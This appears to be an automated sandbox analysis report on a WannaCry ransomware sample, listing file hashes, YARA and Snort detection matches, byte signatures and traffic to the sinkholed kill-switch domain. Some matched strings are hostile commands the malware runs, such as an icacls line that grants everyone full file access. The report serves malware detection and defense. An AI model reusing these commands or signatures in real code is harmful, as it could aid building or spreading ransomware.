Windows Analysis Report
THN6clTA6P.exe

Overview

General Information

Sample Name: THN6clTA6P.exe
Analysis ID: 694554
MD5: 3983f0ebeec88b8005724a203ae27180
SHA1: 9f34d48eae30b6da0a5c5297a873f989a49e10e8
SHA256: ed492db95034ca288dd52df88e3ce3ec7b146ffd854a394ac187f0553ef966d9

Detection

Wannacry
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Tries to download HTTP data from a sinkholed server
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected Wannacry ransomware
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Machine Learning detection for sample
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
Contains functionality to query network adapter information

Process Tree

  • System is w10x64
  • THN6clTA6P.exe (PID: 2996, cmdline: "C:\Users\user\Desktop\THN6clTA6P.exe", MD5: 3983F0EBEEC88B8005724A203AE27180)
  • cleanup

Malware Configuration

No configs have been found
Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
THN6clTA6P.exe | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x374de5:$x2: taskdl.exe
  • 0x38b6d1:$x2: taskdl.exe
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0xe048:$x7: mssecsvc.exe
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0xe034:$s1: C:\%s\%s
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x38be35:$s2: Windows 10 -->
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x38b2a3:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
THN6clTA6P.exe | WannaCry_Ransomware_Gen | Detects WannaCry Ransomware | Florian Roth (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__
THN6clTA6P.exe | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
THN6clTA6P.exe | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0x4157c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0x415a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
THN6clTA6P.exe | Win32_Ransomware_WannaCry | unknown | ReversingLabs
  • 0x340ba:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x8140:$main_3: 83 EC 50 56 57 B9 0E 00 00 00 BE D0 13 43 00 8D 7C 24 08 33 C0 F3 A5 A4 89 44 24 41 89 44 24 45 89 44 24 49 89 44 24 4D 89 44 24 51 66 89 44 24 55 50 50 50 6A 01 50 88 44 24 6B FF 15 34 A1 40 ...
  • 0x8090:$start_service_3: 83 EC 10 68 04 01 00 00 68 60 F7 70 00 6A 00 FF 15 6C A0 40 00 FF 15 2C A1 40 00 83 38 02 7D 09 E8 6B FE FF FF 83 C4 10 C3 57 68 3F 00 0F 00 6A 00 6A 00 FF 15 10 A0 40 00 8B F8 85 FF 74 32 53 ...
  • 0x9a16:$entrypoint_all: 55 8B EC 6A FF 68 A0 A1 40 00 68 A2 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C0 A0 40 00 59 83 0D 94 F8 70 00 FF 83 0D 98 F8 70 ...
  • 0x3985e:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
00000001.00000000.262463921.000000000040F000.00000008.00000001.01000000.00000005.sdmp | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmp | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0xf57c:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf5a4:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Process Memory Space: THN6clTA6P.exe PID: 2996 | JoeSecurity_Wannacry | Yara detected Wannacry ransomware | Joe Security
Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.THN6clTA6P.exe.7100a4.1.raw.unpack | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x342d41:$x2: taskdl.exe
  • 0x35962d:$x2: taskdl.exe
  • 0xf4d8:$x3: tasksche.exe
  • 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0xf52c:$x5: WNcry@2ol7
  • 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x359d91:$s2: Windows 10 -->
  • 0xf42c:$s3: cmd.exe /c "%s"
  • 0x41980:$s4: msg/m_portuguese.wnry
  • 0x3591ff:$s4: msg/m_portuguese.wnry
  • 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C
  • 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56
  • 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
1.2.THN6clTA6P.exe.7100a4.1.raw.unpack | wanna_cry_ransomware_generic | detects wannacry ransomware on disk and in virtual page | us-cert code analysis team
  • 0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63
  • 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
1.2.THN6clTA6P.exe.7100a4.1.raw.unpack | Win32_Ransomware_WannaCry | unknown | ReversingLabs
  • 0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ...
  • 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
1.0.THN6clTA6P.exe.400000.0.unpack | WannaCry_Ransomware | Detects WannaCry Ransomware | Florian Roth (with the help of binar.ly)
  • 0x415a0:$x1: icacls . /grant Everyone:F /T /C /Q
  • 0x374de5:$x2: taskdl.exe
  • 0x38b6d1:$x2: taskdl.exe
  • 0x3136c:$x3: tasksche.exe
  • 0x4157c:$x3: tasksche.exe
  • 0x41558:$x4: Global\MsWinZonesCacheCounterMutexA
  • 0x415d0:$x5: WNcry@2ol7
  • 0x17350:$x7: mssecsvc.exe
  • 0x31344:$x8: C:\%s\qeriuwjhrf
  • 0x415a0:$x9: icacls . /grant Everyone:F /T /C /Q
  • 0x17338:$s1: C:\%s\%s
  • 0x31358:$s1: C:\%s\%s
  • 0x38be35:$s2: Windows 10 -->
  • 0x414d0:$s3: cmd.exe /c "%s"
  • 0x73a24:$s4: msg/m_portuguese.wnry
  • 0x38b2a3:$s4: msg/m_portuguese.wnry
  • 0x2e68c:$s5: \\192.168.56.20\IPC$
  • 0x1ba81:$s6: \\172.16.99.5\IPC$
  • 0x9131:$op1: 10 AC 72 0D 3D FF FF 1F AC 77 06 B8 01 00 00 00
  • 0x3876:$op2: 44 24 64 8A C6 44 24 65 0E C6 44 24 66 80 C6 44
  • 0x13e5:$op3: 18 DF 6C 24 14 DC 64 24 2C DC 6C 24 5C DC 15 88
1.0.THN6clTA6P.exe.400000.0.unpack | WannaCry_Ransomware_Gen | Detects WannaCry Ransomware | Florian Roth (based on rule by US CERT)
  • 0x1bacc:$s1: __TREEID__PLACEHOLDER__
  • 0x1bb68:$s1: __TREEID__PLACEHOLDER__
  • 0x1c3d4:$s1: __TREEID__PLACEHOLDER__
  • 0x1d439:$s1: __TREEID__PLACEHOLDER__
  • 0x1e4a0:$s1: __TREEID__PLACEHOLDER__
  • 0x1f508:$s1: __TREEID__PLACEHOLDER__
  • 0x20570:$s1: __TREEID__PLACEHOLDER__
  • 0x215d8:$s1: __TREEID__PLACEHOLDER__
  • 0x22640:$s1: __TREEID__PLACEHOLDER__
  • 0x236a8:$s1: __TREEID__PLACEHOLDER__
  • 0x24710:$s1: __TREEID__PLACEHOLDER__
  • 0x25778:$s1: __TREEID__PLACEHOLDER__
  • 0x267e0:$s1: __TREEID__PLACEHOLDER__
  • 0x27848:$s1: __TREEID__PLACEHOLDER__
  • 0x288b0:$s1: __TREEID__PLACEHOLDER__
  • 0x29918:$s1: __TREEID__PLACEHOLDER__
  • 0x2a980:$s1: __TREEID__PLACEHOLDER__
  • 0x2ab94:$s1: __TREEID__PLACEHOLDER__
  • 0x2abf4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e2c4:$s1: __TREEID__PLACEHOLDER__
  • 0x2e340:$s1: __TREEID__PLACEHOLDER__

Sigma Overview

No Sigma rule has matched
Snort IDS Alerts

Timestamp: 08/31/22-23:46:48.979040
Source IP: 192.168.2.3
Destination IP: 8.8.8.8
Source Port: 60625
Destination Port: 53
SID: 2024293
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 08/31/22-23:46:49.148342
Source IP: 104.21.68.165
Destination IP: 192.168.2.3
Source Port: 80
Destination Port: 49746
SID: 2016803
Protocol: TCP
Classtype: A Network Trojan was detected

Signature Overview

          AV Detection

Source: THN6clTA6P.exe | Avira: detected
Source: THN6clTA6P.exe | Virustotal: Detection: 88%
Source: THN6clTA6P.exe | Metadefender: Detection: 89%
Source: THN6clTA6P.exe | ReversingLabs: Detection: 100%
Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | Avira URL Cloud: Label: malware
Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Avira URL Cloud: Label: malware
Source: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Virustotal: Detection: 5%
Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | Virustotal: Detection: 5%
Source: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com | Virustotal: Detection: 5%
Source: THN6clTA6P.exe | Joe Sandbox ML: detected
Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack | Avira: Label: TR/Ransom.JB
Source: 1.2.THN6clTA6P.exe.400000.0.unpack | Avira: Label: TR/Ransom.JB
Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack | Avira: Label: TR/Ransom.JB
Source: 1.0.THN6clTA6P.exe.400000.0.unpack | Avira: Label: TR/Ransom.JB
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: 1_2_00407660 rand,EnterCriticalSection,CryptGenRandom,LeaveCriticalSection,1_2_00407660
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: 1_2_00407620 CryptAcquireContextA,CryptAcquireContextA,InitializeCriticalSection,1_2_00407620
Source: THN6clTA6P.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

          Networking

Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  Date: Wed, 31 Aug 2022 21:46:49 GMT
  Content-Type: text/html;charset=UTF-8
  Content-Length: 113
  Connection: keep-alive
  x-sinkhole: sinkhole@blacklistthisdomain.com
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BwAJjUBV7QoBfDcQC5xHuwWf6HaSer5urPutgRH%2BIhWdxjAnZxQhv3Lj7wdnu2PPlKacdGr9jV%2FTSwi3vI%2BYOhYgTU0rv1q0jFccnc7tRao14EgvdRHCOJyooOZRF5g5vft43xf7R9Y9%2BZ3RRpCsAmuUjh5Fhtj03GcJjYsFDcilY2Vk"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 7438f608df147765-LHR
  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 42 6c 61 63 6b 4c 69 73 74 54 68 69 73 44 6f 6d 61 69 6e 20 2d 20 53 69 6e 6b 68 6f 6c 65 3c 2f 68 31 3e 0a 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e
  Data Ascii: <!DOCTYPE html><body> <h1>BlackListThisDomain - Sinkhole</h1> <p>This domain has been sinkholed.</p></body>
Source: Traffic | Snort IDS: 2024293 ET TROJAN Possible WannaCry DNS Lookup 2 192.168.2.3:60625 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 104.21.68.165:80 -> 192.168.2.3:49746
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1
  Host: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
  Cache-Control: no-cache
Source: THN6clTA6P.exe | String found in binary or memory: http://www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: unknown | DNS traffic detected: queries for: www.ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Source: C:\Users\user\Desktop\THN6clTA6P.exe | Code function: 1_2_00406F50 GlobalAlloc,send,recv,htons,send,recv,GlobalFree,1_2_00406F50

          Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: THN6clTA6P.exe, type: SAMPLE
Source: Yara match | File source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.262463921.000000000040F000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: THN6clTA6P.exe PID: 2996, type: MEMORYSTR

          System Summary

Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 00000001.00000000.262558061.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY | Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: THN6clTA6P.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: THN6clTA6P.exe, type: SAMPLE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.THN6clTA6P.exe.7100a4.1.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.THN6clTA6P.exe.7100a4.1.raw.unpack, type: UNPACKEDPE | Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.THN6clTA6P.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
